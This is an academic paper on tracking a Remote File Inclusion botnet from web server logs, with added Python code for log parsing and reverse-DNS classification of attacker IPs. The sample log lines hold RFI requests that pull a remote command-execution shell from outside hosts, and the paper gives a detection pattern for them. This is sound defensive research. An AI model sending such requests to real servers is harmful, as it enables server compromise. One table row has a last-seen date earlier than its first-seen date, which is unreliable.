Electronics, Robotics and Automotive Mechanics Conference 2008
Types of hosts on a Remote File Inclusion (RFI) botnet
Hugo F. González Robledo, Universidad Politécnica de San Luis Potosí
[email protected]

Abstract

Attacks against web servers are increasing rapidly and serve many different purposes; one of the principal vectors of these attacks is Remote File Inclusion (RFI), often carried out automatically. We supposed that in a botnet involved in RFI attacks the attackers (the hosts that launch the attack) are compromised web servers, given the natural form of the attack and of the tool (the remote file to include). We therefore went deeper and identified the type of host that acts as attacker, through a remote analysis based on domain name, content and dynamic IP addresses. A large botnet involved in RFI attacks was tracked for almost a year, and we determined its behavior and the kind of hosts that act as attackers and as hosters. The tracking was done with the web server logs of one university, compared with other sources. The interesting facts found here relate to the botnet selected for study: this botnet is formed by other kinds of hosts, not web servers at all, and the tool used to compromise web servers is a very general shell. Another contribution of this work is a methodology for tracking RFI botnets that can be used in real time or on historical data.

1. Introduction

First let us define some terms. The attacker is the compromised host that launches an RFI attack; the target is the host with the web server and the web application that receives the attack; the tool is the remote file used in the attack to try to compromise the target. The hoster is the host with a web server or an FTP server that contains the tool used by the attackers. A hit is a unique attack from a unique IP. A botnet is a large number of hosts compromised and controlled to do things that benefit the owner of the botnet; such activities commonly include phishing, spamming, DDoS attacks and other kinds of attacks. One of the principal activities on the Internet is the web, so web servers with web applications are common and are used on a large number of sites today. Since attacks on hosts or networks have become more difficult over the years, many attacks are now focused on those web applications, and some of them are launched automatically by botnets. There are many works that study the botnet phenomenon, such as [8], [9] and [6]; however, none of them focused on RFI attacks or on the type of hosts involved in them. Some ideas for tracking this particular botnet were taken from them. This paper is organized as follows: first some background is presented; the next section states the question of this work, followed by the methods and procedures; then results, discussion and conclusions are presented; finally, future work.

2. Background

2.1. Remote File Inclusion

There are different kinds of web attacks; in [3] four principal ones are cited: 1. SQL injection. 2. Code inclusion. 3. Cross-site scripting. 4. Remote file inclusion.

Remote File Inclusion (RFI) is based on a feature of some programming languages that allows calling pieces of code located elsewhere, including other Internet sites or directories on the same hard drive. This is a great advantage for the programmer, but when neglected it can become a successful attack point and later lead to the compromise of the host. This feature is widely used in large web system developments, from which vulnerabilities and attack points can be picked out and used by attackers. Some of the classic functionalities used in RFI are a complete shell with access to the server and the installation of a bot. The typical behavior observed for this attack is shown in Fig. 1.
978-0-7695-3320-9/08 $25.00 © 2008 IEEE DOI 10.1109/CERMA.2008.60
Figure 1. Behavior of the bot in an RFI attack

2.2. Botnets

A zombie network, or botnet, is made up of several hosts that have been successfully attacked and compromised; this network is organized in such a way that it can be remotely controlled in order to cause harm and perform actions that serve the purposes of the attacker [11] [10]. The ways of controlling these botnets range from an IRC client to complicated peer-to-peer systems. This information and its monitoring are out of the scope of this document, since they leave no traces in the log files of the web server. The analysis of some clients used in botnets for PHP code inclusion attacks is documented in [4], and in [7] a specific analysis is made of the first automatically spreading worm that affected web applications. Among the detected functionalities of the collected perlbots are distributed denial of service attacks, scanning for vulnerable sites, remote file inclusion attacks and sending unwanted e-mail messages (spam), which correspond to the common uses of a botnet [2].

2.3. Dynamic IP addresses

There is some related work on how to identify dynamic ranges of IP addresses; a general approach is to use rDNS and the whois database [1]. That is the approach taken in this work. For example, 207.112.19.152 resolves with nslookup to dsl-207-112-19152.tor.primus.ca, from which we suppose that it is a digital subscriber line (DSL) that uses dynamic IP assignment and is located in Canada. Since there are no attacks at the same time from those IPs, we could think they belong to the same host, but we are not 100% sure. Later we present some words that indicate dynamic IP addresses.

3. Question work

The question this work tries to answer is: are the attackers on an RFI botnet compromised web servers? There are some possible answers:
• Yes, the botnet is formed by compromised web servers.
• No, other kinds of botnets are used for RFI attacks.
• There are mixed botnets.

4. Methods and procedures

We have logs since early 2007, and we looked for the longest-lived and related tools in order to identify and track the selected botnet; these tools are shown in Table 1. Because a group of attacker IPs uses these tools, and the names of the hosters used, the file name and the tool itself (obtained from some of those places) are the same, we suppose they are closely related.

Table 1. Tools selected related to a botnet
tool                                        first seen           last seen            bots  attacks
amygirl.3-hosting.net/cs.txt                2007-09-26 05:51:52  2007-04-01 07:59:07    33       62
amyru.h18.ru/images/cs.txt                  2007-09-30 15:46:36  2008-04-07 21:20:55   536      939
amygirl.siteburg.com/images/cs.txt          2007-10-02 07:44:32  2008-03-27 19:06:40     5       14
amygirly.sky.prohosting.com/images/cs.txt   2007-10-02 08:34:15  2008-01-24 20:08:55     4        5
ninaru.hut2.ru/images/cs.txt                2007-10-04 08:54:11  2008-04-07 15:55:51   212      488
cherrygirl.h18.ru/images/cs.txt             2007-10-25 09:12:58  2008-03-30 18:20:43    63      120

With this information we obtain the IPs of the attackers, plot the data on a world map, plot the behavior over time, and then use nslookup to get information about each host and whether or not it has a dynamic IP address; then we verify whether the host is online and try to connect to a web server. From the information returned by the web server we presume which operating system, web server and modules are running on it. Finally the question will be answered for this botnet.
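The log-analysis step of the tracking methodology above (and of the step list in Section 6), as an added example that is not part of the paper: it reads web server log lines, applies the paper's =[fh]t trigger, extracts attacker, date, hoster and tool, and groups the hits into the columns of Table 1. The Apache combined log layout, the sample lines (attacker IPs are documentation addresses; the tool paths are taken from Table 1) and the function names are assumptions of this example.

```python
import re
from collections import Counter
from dataclasses import dataclass
from datetime import datetime

# Apache "combined" access-log layout. The paper does not say which web server produced
# its logs, so this layout is an assumption of the example.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# The paper's grep trigger: a parameter whose value starts with http:// or ftp://
RFI_TRIGGER = re.compile(r'=[fh]t')
# Full remote URL behind the trigger; stops at the '?' or '??' that RFI requests append
REMOTE_URL = re.compile(r'=(?P<url>(?:https?|ftp)://[^&\s"?]+)')


@dataclass
class Hit:
    attacker: str       # IP that launched the request
    when: datetime
    target: str         # local script attacked, e.g. /index.php
    param: str          # parameter carrying the remote file, e.g. option
    hoster: str         # host serving the tool
    tool: str           # hoster + path, the key used in Table 1


def parse_hit(line):
    """Return a Hit for an RFI request line, or None for anything else."""
    m = LOG_RE.match(line)
    if not m or not RFI_TRIGGER.search(m['uri']):
        return None
    target, _, query = m['uri'].partition('?')
    u = REMOTE_URL.search(query)
    if not u:                      # trigger matched plain text such as "q=htaccess"
        return None
    param = query[:u.start()].rsplit('&', 1)[-1]
    hoster_and_path = u['url'].split('://', 1)[1]
    hoster = hoster_and_path.split('/', 1)[0]
    when = datetime.strptime(m['ts'].split()[0], '%d/%b/%Y:%H:%M:%S')
    return Hit(m['ip'], when, target, param, hoster, hoster_and_path)


def summarize_tools(lines):
    """Per tool: first seen, last seen, distinct bots and attack count (Table 1 columns)."""
    stats = {}
    for line in lines:
        hit = parse_hit(line)
        if hit is None:
            continue
        s = stats.setdefault(hit.tool, {'first_seen': hit.when, 'last_seen': hit.when,
                                        'bots': set(), 'attacks': 0})
        s['first_seen'] = min(s['first_seen'], hit.when)
        s['last_seen'] = max(s['last_seen'], hit.when)
        s['bots'].add(hit.attacker)
        s['attacks'] += 1
    return {tool: {'first_seen': s['first_seen'].strftime('%Y-%m-%d %H:%M:%S'),
                   'last_seen': s['last_seen'].strftime('%Y-%m-%d %H:%M:%S'),
                   'bots': len(s['bots']), 'attacks': s['attacks']}
            for tool, s in stats.items()}


def attacker_ips(lines):
    """Distinct attacker IPs across all tools (the paper's 837 figure is this kind of count)."""
    return sorted({h.attacker for h in map(parse_hit, lines) if h})


def attacked_targets(lines):
    """Which local script and parameter the bots hit; the paper's botnet only used index.php?option=."""
    return Counter((h.target, h.param) for h in map(parse_hit, lines) if h)


# Constructed sample log: attacker IPs are documentation addresses, tool paths come from Table 1.
SAMPLE_LOG = [
    '192.0.2.10 - - [30/Sep/2007:15:46:36 -0600] "GET /index.php?option=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"',
    '198.51.100.7 - - [04/Oct/2007:08:54:11 -0600] "GET /index.php?option=http://ninaru.hut2.ru/images/cs.txt?? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"',
    '192.0.2.10 - - [07/Apr/2008:21:20:55 -0600] "GET /index.php?option=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 404 210 "-" "libwww-perl/5.805"',
    '192.0.2.44 - - [12/Dec/2007:01:02:03 -0600] "GET /index.php?option=ftp://amyru.h18.ru/images/cs.txt? HTTP/1.0" 200 512 "-" "Mozilla/4.0"',
    '203.0.113.9 - - [01/Oct/2007:10:00:00 -0600] "GET /index.php?option=contact HTTP/1.1" 200 3120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [01/Oct/2007:10:00:05 -0600] "GET /search.php?q=htaccess HTTP/1.1" 200 980 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for tool, s in summarize_tools(SAMPLE_LOG).items():
        print(tool, s)
    print('attackers:', attacker_ips(SAMPLE_LOG))
    print(attacked_targets(SAMPLE_LOG))
```

The trigger is only a cheap pre-filter: the last sample line matches =[fh]t through a benign value, and the URL extraction is what discards it. The 404 line is kept on purpose, since the paper observes bots that keep requesting a tool after the hoster has removed it.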
5. Results

5.1. Botnet behavior and distribution

These tools reported a lot of activity for almost 100 days. The number of IPs of compromised machines is 837, with a total of 1628 attacks. One important thing about this botnet is that it only attacks the index.php file, with the option parameter used to include the remote file, so it is a very explicit attack. The botnet is distributed around the world as shown in Fig. 2, which points out that there are many bots on the east coast of the USA; the blue circles correspond to locations with fewer than 30 hits (the deeper the blue, the more hits), the red circles to locations with more than 30 hits but fewer than 100, and there is only one yellow circle, for a location with more than 100 hits. The historical behavior of RFI attacks by tool is shown in Fig. 3. We can see the activity over the last 6 months, and the behavior is the one described for this type of botnet in [5]: it begins with a first detection, then grows a lot, and finally tends to decrease and disappear or almost disappear.

Table 2. Attacker's domains
Domain             number of ips
alltel.net                     6
arrownet.dk                    2
bellsouth.net                  7
btcentralplus.com             11
casema.nl                      7
cgocable.net                   5
charter.com                   27
comcast.net                    8
conwaycorp.net                 6
cox.net                        4
dsl.bell.ca                  256
netcabo.pt                    14
numericable.fr                16
pipex.com                      7
pldt.net                      12
power-net.net                  2
primus.ca                      7
rdsnet.ro                      2
res.rr.com                     6
rogers.com                     7
scarlet.be                     9
shawcable.net                 54
tele.dk                       11
user.ono.com                   5
verizon.net                  116
videotron.ca                   6
wideopenwest.com              12
5.2. The tool

The tool used, cs.txt, is a simple wrapper to execute any command on the web server; it tries the PHP functions exec, shell_exec, system and passthru. The command to execute must be given as a parameter, in a POST request or in another way, to obtain an effective compromise of the server. This tool is no longer available at the sites mentioned here; we suppose it was removed by the administrators of those sites.

5.3. Lookup of the IPs

By now we are almost sure that a large number of items are located on the east coast of the USA, and the nslookups confirm this. There were a few IPs that did not respond to the nslookup tool, and we discovered that the majority of the bots are located on cable or ADSL Internet connections. The most active domains with bots are shown in Table 2. The bell.ca domain reports 256 IPs with bots, possibly the same host with different IPs. The second domain is verizon.net with 116 IPs with bots; the domain name refers specifically to dsl-w.verizon.net, which is the name identifying subscribers. The third domain is shawcable.net with 54 IPs, but it is divided among some states identified by the domain name. Next is numericable.fr from France with 16 IPs and netcabo.pt from Portugal with 14 IPs. There is also 1 IP from Mexico, an ADSL subscriber of prodigy. We checked port 80 on these IPs, and the response was open for all targets, but when we tried to connect, none of them responded with any web page. We suppose that some of these IPs are dynamic and the ISP filters the response so that the port appears open, while in reality some of these hosts are down.
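The reverse-DNS classification used in Sections 2.3 and 5.3, as an added example that is not part of the paper: it marks a PTR name as dynamic when it contains a residential-line word or the address's own octets, reduces the name to an ISP domain, and counts distinct IPs per domain in the layout of Table 2. The word list, the domain heuristic (the paper's table keeps some third-level labels such as dsl.bell.ca, which this simplification does not), the function names and the sample pairs are assumptions of this example; only the primus.ca pair is taken from the paper, and the lookup() helper is provided for real use but is not called by the offline sample.

```python
import re
import socket
from collections import defaultdict

# Tokens that suggest a residential or dynamically assigned line in a reverse DNS name.
# This list is an assumption of the example; the paper mentions the idea but gives no list.
DYNAMIC_WORDS = ("dsl", "adsl", "cable", "dyn", "dynamic", "pool", "ppp", "dial",
                 "dhcp", "res", "cust", "user", "dynip")


def lookup(ip):
    """Reverse DNS lookup (what the paper does with nslookup); PTR name or None.
    Not used by the offline sample below, so the example runs without network access."""
    try:
        return socket.gethostbyaddr(ip)[0]
    except (socket.herror, socket.gaierror, OSError):
        return None


def _tokens(name):
    return [t for t in re.split(r"[.\-_]", name.lower()) if t]


def has_embedded_ip(ip, name):
    """True when at least two octets of the address appear as separate tokens of the name
    (threshold chosen so that a name with two fused octets still counts)."""
    octets = set(ip.split("."))
    return sum(1 for t in _tokens(name) if t in octets) >= 2


def is_dynamic_name(name):
    """A token equal to a dynamic word, or a dynamic word followed by digits (pool123)."""
    for t in _tokens(name):
        for w in DYNAMIC_WORDS:
            if t == w or (t.startswith(w) and t[len(w):].isdigit()):
                return True
    return False


def isp_domain(name):
    """Approximate registrable domain: the last two labels, or three for a two-letter
    country TLD with a short second-level label (net.mx). A public suffix list is the
    proper tool; this is a deliberate simplification."""
    labels = name.lower().rstrip(".").split(".")
    if len(labels) >= 3 and len(labels[-1]) == 2 and len(labels[-2]) <= 3:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def classify(ip, name):
    """'no-rdns', 'dynamic' or 'static' for one (ip, PTR name) pair."""
    if not name:
        return "no-rdns"
    if is_dynamic_name(name) or has_embedded_ip(ip, name):
        return "dynamic"
    return "static"


def summarize_domains(pairs):
    """Per ISP domain: distinct IPs and how many of them look dynamic (Table 2 layout)."""
    out = defaultdict(lambda: {"ips": set(), "dynamic": 0})
    for ip, name in pairs:
        kind = classify(ip, name)
        if kind == "no-rdns":
            continue
        d = out[isp_domain(name)]
        if ip not in d["ips"]:
            d["ips"].add(ip)
            d["dynamic"] += kind == "dynamic"
    return {dom: {"ips": len(v["ips"]), "dynamic": v["dynamic"]} for dom, v in out.items()}


# Constructed (ip, PTR) pairs; the first one is the example given in the paper.
SAMPLE_RDNS = [
    ("207.112.19.152", "dsl-207-112-19152.tor.primus.ca"),
    ("192.0.2.17", "pool-192-0-2-17.dsl-w.verizon.net"),
    ("192.0.2.18", "pool-192-0-2-18.dsl-w.verizon.net"),
    ("198.51.100.5", "cpe-198-51-100-5.res.rr.com"),
    ("203.0.113.9", "www.example.org"),
    ("203.0.113.10", None),
]

if __name__ == "__main__":
    for ip, name in SAMPLE_RDNS:
        print(ip, name, classify(ip, name))
    print(summarize_domains(SAMPLE_RDNS))
```

Addresses without a PTR record are counted separately rather than dropped silently, matching the paper's observation that a few IPs did not answer nslookup; the caller can still decide whether to treat them as dynamic.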
Figure 2. World distribution of the botnet

Figure 3. Historical behavior: attacks by month by tool

6. Discussion

This is one of the largest RFI botnets tracked recently, and the origin of the attacks is not compromised web servers; in this case other kinds of bots are used. Since botnets are used for several illicit activities, compromising web servers through RFI is just another one, so not all attackers are previously compromised web servers. But in some cases like this one, when the hoster blocks the tool or makes it unavailable, the bots need to be updated, and they are not. So the attempts to compromise a new host become noise and unwanted traffic on the Internet.

Some kinds of bots try different paths to exploit on the web server, all of them vulnerable or possibly vulnerable to RFI.
These do not, perhaps because of hard-coded instructions in a bot running on home computers. Here we present the methodology for tracking RFI botnets:
• Analyze web server logs looking for an attack pattern like =[fh]t.
• Extract the information about attacker, hoster, date and tool. Log it in a database.
• Try to get the source of the tool; keep the tool and log it.
• Reverse DNS lookup of the attacker; log it.
• Whois of the attacker; log it.
• Search the location in a geolocation database; log it.
• Group the data by hoster and attacker, tool and IPs.
This approach is non-intrusive to a production web server, so it would be possible to concentrate all the data in a central database repository and have a web interface to query it.

7. Conclusions

For this RFI botnet we are sure that the bots are not compromised web servers, for these principal reasons:
1. The attacks were focused on a single file, index.php, using the same file in the tool, cs.txt, with no arguments, like a hard-coded piece of code.
2. Even when the tool was not available, the bots kept trying to use it; in the last month none of the tools were online any more.
3. The hosts with the bots are not online; almost all of them have dynamic IPs and are not available all the time.
So the answer to the question of this work is number two: no, other kinds of botnets are used for RFI attacks. But this holds only for this botnet; with the methodology we will track more botnets.

8. Future work

We are working on improving the methodology used for this botnet tracking and trying to automate it for better results, making the analysis and queries when the attack occurs and not offline as in this case. At the same time we are working on similar analyses of other RFI botnets: first detect them and then do the work. Finally we are working on a web system for the database, to allow anybody to consult and query the behavior and trends of RFI botnets.

References

[1] Whois.net - domain research tools. http://www.whois.net.
[2] J. Aycock. Advances in Information Security, Computer Viruses and Malware. Springer, 2006.
[3] H. F. González Robledo. Desarrollo de una herramienta para obtener el código remoto en ataques de inyección de código a aplicaciones web. Actas del II Simposio sobre Seguridad Informática, pages 111–116, September 2007.
[4] H. F. González Robledo. Obteniendo el código utilizado en ataques de inyección de código en web. IEEE CIINDET 2007, page 254, October 2007.
[5] H. F. González Robledo and F. C. Ordaz Salazar. Ataques de inclusión de archivos remotos a servidor web. IEEE CIINDET 2008, October 2008.
[6] M. Abu Rajab et al. A multifaceted approach to understanding the botnet phenomenon. IMC '06, 2006.
[7] N. Provos, J. McClain, K. Wang. Search worms. WORM '06, November 2006.
[8] J. Nazario. Botnet tracking: Tools, techniques, and lessons learned. Blackhat, 2007.
[9] P. Barford, V. Yegneswaran. An inside look at botnets. 2007.
[10] The Honeynet Project. Know your enemy: Tracking botnets. http://www.honeynet.org/paper/bots/, March 2005.
[11] J. Zhuge et al. Collecting autonomous spreading malware using high-interaction honeypots. ICICS 2007, LNCS 4861, pages 438–451, 2007.